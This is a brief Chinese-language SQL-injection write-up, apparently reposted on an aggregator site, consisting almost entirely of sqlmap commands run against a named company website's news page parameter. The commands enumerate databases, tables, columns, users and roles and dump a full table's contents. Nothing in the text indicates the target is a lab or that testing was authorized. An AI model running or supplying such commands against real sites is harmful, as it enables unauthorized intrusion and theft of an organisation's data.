write up::web 实战2-注入 --sqlmap注入版
生活随笔
收集整理的這篇文章主要介紹了
write up::web 实战2-注入 --sqlmap注入版
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0x00根據注入點爆出數據庫
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs0x01根據數據庫爆出表名
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --tables -D u9897uwx_kabel0x02練點其他的
1.查找某張表的字段信息
比如這里查找最后一張表(tbnomax)的字段信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax2.提取整個表的具體內容
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dump -T tbnomax3.敏感字段進行16進制編碼
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax --hex4.查找用戶
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --users5.提取所有信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 -a6.查看用戶角色信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --rolesend~
總結
以上是生活随笔為你收集整理的write up::web 实战2-注入 --sqlmap注入版的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: write up:web 实战2-注入-
- 下一篇: write up:杂项 又一张图片,还单